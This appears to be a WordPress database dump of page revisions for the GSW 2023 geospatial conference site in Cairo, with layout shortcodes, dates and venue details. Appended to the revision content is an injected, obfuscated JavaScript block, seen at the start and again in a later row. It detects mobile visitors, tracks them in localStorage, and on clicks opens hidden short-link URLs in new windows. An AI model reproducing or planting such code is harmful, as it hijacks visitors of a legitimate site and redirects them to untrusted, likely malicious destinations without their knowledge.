_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 20:23:54','2022-11-09 20:23:54','',3066,'https://gsw2023.com/?p=3214',0,'revision','',0),
(3215,1,'2022-11-09 20:30:40','2022-11-09 20:30:40','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]GSW2023 Will be held at the\r\n\r\n<strong><a>INTERCONTINENTAL CAIRO SEMIRAMIS</a></strong>\r\n\r\n&nbsp;\r\n<h5><strong>MORE INFORMATION</strong></h5>\r\n<h5><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 20:30:40','2022-11-09 20:30:40','',3066,'https://gsw2023.com/?p=3215',0,'revision','',0),
(3216,1,'2022-11-09 20:34:46','2022-11-09 20:34:46','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for 